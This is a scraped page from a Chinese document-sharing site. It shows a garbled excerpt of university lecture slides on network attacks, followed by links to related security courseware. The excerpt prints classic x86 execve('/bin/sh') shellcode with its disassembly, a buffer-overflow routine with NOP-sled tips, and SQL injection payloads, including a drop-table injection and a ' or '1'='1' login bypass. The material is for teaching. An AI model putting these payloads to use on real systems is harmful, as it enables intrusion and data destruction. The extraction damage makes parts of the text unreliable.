正文內(nèi)容

s07-網(wǎng)絡(luò)安全攻擊-在線瀏覽

2025-04-14 17:17本頁(yè)面

　　

【正文】域，再跳轉(zhuǎn)到目標(biāo)程序并執(zhí)行。獲取高級(jí)用戶甚至超級(jí)用戶權(quán)限從而完全控制目標(biāo)主機(jī) 正常流程 Trick：程序調(diào)用的“庫(kù)函數(shù)”即系統(tǒng)函數(shù)通常具有系統(tǒng)最高權(quán)限。 name[0] = /bin/sh。 execve(name[0],name,NULL)。 } 0x80482c7 main+03:jmp 0x80482e8 main+36 0x80482c9 main+05:pop %esi 0x80482ca main+06:mov %esi,0x8(%esi) 0x80482cd main+09:xor %eax,%eax 0x80482cf main+11:mov %al,0x7(%esi) 0x80482d2 main+14:mov %eax,0xc(%esi) 0x80482d5 main+17:mov $0xb,%al 0x80482d7 main+19:mov %esi,%ebx 0x80482d9 main+21:lea 0x8(%esi),%ecx 0x80482dc main+24:lea 0xc(%esi),%edx 0x80482df main+27:int $0x80 0x80482e1 main+29:xor %ebx,%ebx 0x80482e3 main+31:mov %ebx,%eax 0x80482e5 main+33:inc %eax 0x80482e6 main+34:int $0x80 0x80482e8 main+36:call 0x80482c9 main+5 0x80482ed main+41:.string ?/bin/sh? char shellcode[] = 0x80482c7main+03:0xeb 0x2f 0x5e 0x89 0x76 0x08 0x31 0xc0 0x80482cfmain+11:0x88 0x46 0x07 0x89 0x46 0x0c 0xb0 0x0b 0x80482d7main+19:0x89 0xf3 0x8d 0x4e 0x08 0x8d 0x56 0x0c 0x80482dfmain+27:0xcd 0x80 0x31 0xdb 0x89 0xd8 0x40 0xcd 0x80482e7main+35:0x80 0xe8 0xdc 0xff 0xff 0xff ‘/’’b’ 0x80482ffmain+43:’i’’n’’/’’s’’h’ （該程序功能為執(zhí)行 name指定的命令行命令；本例為打開(kāi)新的 shell） lingli ● 代碼網(wǎng)絡(luò)安全攻擊 23 37 c h a r sh e ll c o d e [ 4 8 ] = … （數(shù)據(jù)略）c h a r larg e _ strin g [ 3 2 ] 。v o id o v e rf lo w ( ) {c h a r b u f f e r[ 6 4 ] 。in t i。 i 8 。/* 從 sh e ll c o d e 開(kāi)始拷貝到 b u ff e r * /strc p y (b u ffe r, sh e ll c o d e )。技巧： ① 多個(gè)代碼起始地址，提高命中率； ② 代碼以空指令開(kāi)始，提高命中率； ③ 嘗試不同的組合結(jié)構(gòu)，適應(yīng)不同的棧結(jié)構(gòu)。 CityName = (CityName)。 + CityName + 39。若 CityName輸入 Shanghai select * from OrdersTable where CityName = 39。（查詢訂單數(shù)據(jù)表 OrdersTable中所有有關(guān) Shanghai的記錄） lingli 網(wǎng)絡(luò)安全攻擊 28 37 var CityName。 var sql = select * from OrdersTable where CityName = 39。。 drop table OrdersTable select * from OrdersTable where CityName = 39。 drop table OrdersTable 39。）表示一個(gè)操作的結(jié)束和另一個(gè)操作的開(kāi)始；雙連字符（）指示當(dāng)前行余下的部分是注釋內(nèi)容，應(yīng)該忽略數(shù)據(jù)庫(kù) 將首先檢索出 OrdersTable中有關(guān) Shanghai的所有記錄，然后將執(zhí)行 drop table命令，即執(zhí)行刪除OrdersTable數(shù)據(jù)表！ lingli 網(wǎng)絡(luò)安全攻擊 29 37 Select * from users where username=39。 and password=39。輸入 username和 password 可用以驗(yàn)證用戶合法性 lingli 網(wǎng)絡(luò)安全攻擊 30 37 Select * from users where username=39。 and password=39。若 username輸入 39。139。139。 39。139。139。 and password=39。由于 ‘1’=‘1’恒成立，不論 password輸入什么，用戶驗(yàn)證總是得到通過(guò)！ lingli 網(wǎng)絡(luò)安全攻擊 31 37 相關(guān) SQL語(yǔ)句如： select * from 表名 where 字段 =XX lingli 網(wǎng)絡(luò)安全攻擊 32 37 user為 SQL數(shù)據(jù)庫(kù)內(nèi)置變量，為當(dāng)前連接的用戶的用戶名 user類型為 nvarchar（不同于 int類型） user與整數(shù)型（ int）的 0相比較，系統(tǒng)將嘗試把 user轉(zhuǎn)換為 int user轉(zhuǎn)換必定出錯(cuò)，則報(bào)錯(cuò) —— 將 nvarchar值“ abc”轉(zhuǎn)換為 in

點(diǎn)擊復(fù)制文檔內(nèi)容

教學(xué)課件相關(guān)推薦

[精選]網(wǎng)絡(luò)攻擊、網(wǎng)絡(luò)病毒防范處理,網(wǎng)絡(luò)安全可控性-在線瀏覽

【摘要】網(wǎng)絡(luò)攻擊、網(wǎng)絡(luò)病毒防范處理、網(wǎng)絡(luò)安全可控性蘇亮2023-04主要內(nèi)容?1、集團(tuán)網(wǎng)絡(luò)現(xiàn)狀?2、網(wǎng)絡(luò)安全需求分析?3、網(wǎng)絡(luò)安全可控性分析?4、常見(jiàn)網(wǎng)絡(luò)攻擊及防范?5、常見(jiàn)網(wǎng)絡(luò)病毒及防范現(xiàn)狀?出口:中興US2023雙機(jī)熱備—電信30M+網(wǎng)通10M+DMZ二級(jí)分公

2025-02-19 15:21

[精選]網(wǎng)絡(luò)安全4-拒絕服務(wù)攻擊-在線瀏覽

【摘要】網(wǎng)絡(luò)安全西南科技大學(xué)計(jì)算機(jī)科學(xué)與技術(shù)學(xué)院2第3章回顧?網(wǎng)絡(luò)掃描?網(wǎng)絡(luò)監(jiān)聽(tīng)?口令破解討論：如何發(fā)現(xiàn)和預(yù)防ARP欺騙（ARPPoisoning）攻擊？3第4章拒絕服務(wù)攻擊?本章介紹DoS攻擊的定義、思想和分類，對(duì)SYNFlooding攻擊、Smurf攻擊、利

2025-03-16 20:59

[精選]網(wǎng)絡(luò)安全第2章黑客與攻擊技術(shù)-在線瀏覽

【摘要】第2章黑客與攻擊技術(shù)黑客概述黑客1．什么是黑客黑客是“Hacker”的音譯，源于動(dòng)詞Hack，其引申意義是指“干了一件非常漂亮的事”。這里說(shuō)的黑客是指那些精于某方面技術(shù)的人。對(duì)于計(jì)算機(jī)而言，黑客是指既具有高超的專業(yè)技術(shù)（精通網(wǎng)絡(luò)、系統(tǒng)、外設(shè)以及軟硬件技術(shù)），

2025-03-12 11:13

網(wǎng)絡(luò)安全技術(shù)第2章、網(wǎng)絡(luò)攻擊技術(shù)-在線瀏覽

【摘要】個(gè)人介紹陳興鈺長(zhǎng)春方聯(lián)計(jì)算機(jī)高級(jí)技術(shù)培訓(xùn)中心講師E-mail:MSN:Tel:0431-85155777/888/999－813網(wǎng)絡(luò)攻擊技術(shù)第六講、網(wǎng)絡(luò)入侵技術(shù)一、網(wǎng)絡(luò)入侵概述：二、常見(jiàn)的網(wǎng)絡(luò)入侵技術(shù)：三、常見(jiàn)的DoS、DDoS攻擊工具：四、DoS、DDoS的防范：一、網(wǎng)絡(luò)入侵概述：

2025-02-22 14:20

[精選]網(wǎng)絡(luò)安全07-防火墻-在線瀏覽

【摘要】網(wǎng)絡(luò)安全防火墻技術(shù)網(wǎng)絡(luò)安全的構(gòu)成?物理安全性?設(shè)備的物理安全：防火、防盜、防破壞等?通信網(wǎng)絡(luò)安全性?防止入侵和信息泄露?系統(tǒng)安全性?計(jì)算機(jī)系統(tǒng)不被入侵和破壞?用戶訪問(wèn)安全性?通過(guò)身份鑒別和訪問(wèn)控制，阻止資源被非法用戶訪問(wèn)?數(shù)據(jù)安全性?數(shù)據(jù)的完整、可用?數(shù)據(jù)保密性

2025-02-26 12:58

網(wǎng)絡(luò)攻擊與網(wǎng)絡(luò)安全畢業(yè)設(shè)計(jì)論文-在線瀏覽

【摘要】江西渝州科技職業(yè)學(xué)院計(jì)算機(jī)分院畢業(yè)設(shè)計(jì)論文課題名稱:網(wǎng)絡(luò)攻擊與網(wǎng)絡(luò)安全專業(yè)：軟件工程學(xué)號(hào):1065080139學(xué)生姓名:鄭霖云班級(jí):06

2025-02-05 15:20

[精選]網(wǎng)絡(luò)安全攻與防v2-天融信-在線瀏覽

【摘要】網(wǎng)絡(luò)安全攻與防宮一鳴微博：宮一鳴2023年10月新聞一則?10月18日：Belgainvestigatesrouterpromiseatitscarrierservicesarm–Underseacables:160countries700operators–OnSept.16

2025-02-19 15:12

[精選]網(wǎng)絡(luò)安全4-拒絕服務(wù)攻擊_2-在線瀏覽

【摘要】網(wǎng)絡(luò)安全2第3章回顧?網(wǎng)絡(luò)掃描?網(wǎng)絡(luò)監(jiān)聽(tīng)?口令破解3第4章拒絕服務(wù)攻擊?本章介紹DoS攻擊的定義、思想和分類，對(duì)SYNFlooding攻擊、Smurf攻擊、利用處理程序錯(cuò)誤的拒絕服務(wù)攻擊、電子郵件轟炸攻擊和分布式拒絕服務(wù)攻擊(DdoS)方法分別進(jìn)行了詳細(xì)的分析，并對(duì)每一種攻擊提供

2025-03-16 20:58

網(wǎng)絡(luò)安全風(fēng)險(xiǎn)分析-2-欺騙攻擊-在線瀏覽

【摘要】第二章網(wǎng)絡(luò)安全風(fēng)險(xiǎn)分析-DoS和欺騙攻擊拒絕服務(wù)攻擊DoS指任何導(dǎo)致你的服務(wù)器不能正常提供服務(wù)的攻擊。最常見(jiàn)的DoS攻擊有計(jì)算機(jī)網(wǎng)絡(luò)帶寬攻擊和連通性攻擊。帶寬攻擊指以極大的通信量沖擊網(wǎng)絡(luò)，使得所有可用網(wǎng)絡(luò)資源都被消耗殆盡，最后導(dǎo)致合法的用戶請(qǐng)求無(wú)法通過(guò)；連通性攻擊指用大量的連接請(qǐng)求

2025-02-26 23:48

網(wǎng)絡(luò)安全黑客攻擊手段分析-學(xué)年論-在線瀏覽

【摘要】甘肅政法學(xué)院本科學(xué)年論文（設(shè)計(jì)）題目網(wǎng)絡(luò)安全黑客攻擊手段分析信息工程學(xué)院信息管理與信息系統(tǒng)專業(yè)20224級(jí)本科班學(xué)號(hào)2022481020226姓名馬騰指導(dǎo)教師李霞成績(jī)

2025-02-25 10:39

s08-網(wǎng)絡(luò)安全防范-在線瀏覽

【摘要】凌力lingli●網(wǎng)絡(luò)安全防范技術(shù)要點(diǎn)●嵌入式安全防范技術(shù)?防火墻?代理●主動(dòng)式安全防范技術(shù)?安全口令?VLAN?VPN●被動(dòng)式安全防范技術(shù)?網(wǎng)頁(yè)防篡改?入侵檢測(cè)?安全審計(jì)網(wǎng)絡(luò)安全防范412lingli●NetworkSecurityDefen

2025-04-14 17:07

保障與安全攻擊(1)-在線瀏覽

【摘要】1攻擊（1）一、攻擊的基本概念21、攻擊的位置一、攻擊的一些基本概念簡(jiǎn)單的入侵一個(gè)個(gè)人用戶的機(jī)器，或是使某個(gè)大型主機(jī)完全癱瘓直至破壞掉所有的數(shù)據(jù)，都稱為攻擊。（1）遠(yuǎn)程攻擊：從該子網(wǎng)以外的地方向該子網(wǎng)或者該子網(wǎng)內(nèi)的系統(tǒng)發(fā)動(dòng)攻擊(時(shí)間、地點(diǎn))。（2）本地攻擊：通過(guò)所在的局域

2025-02-26 21:31

網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室方案-在線瀏覽

【摘要】網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室建設(shè)方案XXXX信息科學(xué)與工程學(xué)院2022/6/7目錄第一章網(wǎng)絡(luò)安全人才需求 3 3 3 4第二章網(wǎng)絡(luò)安全技術(shù)教學(xué)存在的問(wèn)題 4 4 4 5第三章安全攻防實(shí)驗(yàn)室特點(diǎn) 5 5第四章安全攻防實(shí)驗(yàn)室方案 6 6傳統(tǒng)安全設(shè)備 6安全沙盒——使實(shí)

2025-07-01 18:55

信息安全原理與技術(shù)ch07-網(wǎng)絡(luò)安全協(xié)議-在線瀏覽

【摘要】信息安全原理與技術(shù)第2版郭亞軍宋建華李莉董慧慧清華大學(xué)出版社2023/2/27星期六Ch7-網(wǎng)絡(luò)安全協(xié)議第7章網(wǎng)絡(luò)安全協(xié)議?主要知識(shí)點(diǎn)：簡(jiǎn)單的安全認(rèn)證協(xié)議Kerberos協(xié)議SSL協(xié)議IPSec協(xié)議PGP2023/2/27星期六2Ch7-網(wǎng)絡(luò)

2025-03-11 01:59

[精選]網(wǎng)絡(luò)安全概述_07ipsec及fw-在線瀏覽

【摘要】第7講保密通信（一）IPSecFWPage11防火墻概述?基本概念?關(guān)鍵技術(shù)?體系結(jié)構(gòu)?網(wǎng)絡(luò)隔離2基本概念?防火墻概念–WilliamCheswick和SteveBeilovin（1994）：防火墻是放置在兩個(gè)網(wǎng)絡(luò)之間的一組組件，這組組件共同具有下列性質(zhì)：?只允許本地安全策略授權(quán)的通信信息通過(guò)?雙向通信信

2025-03-12 11:12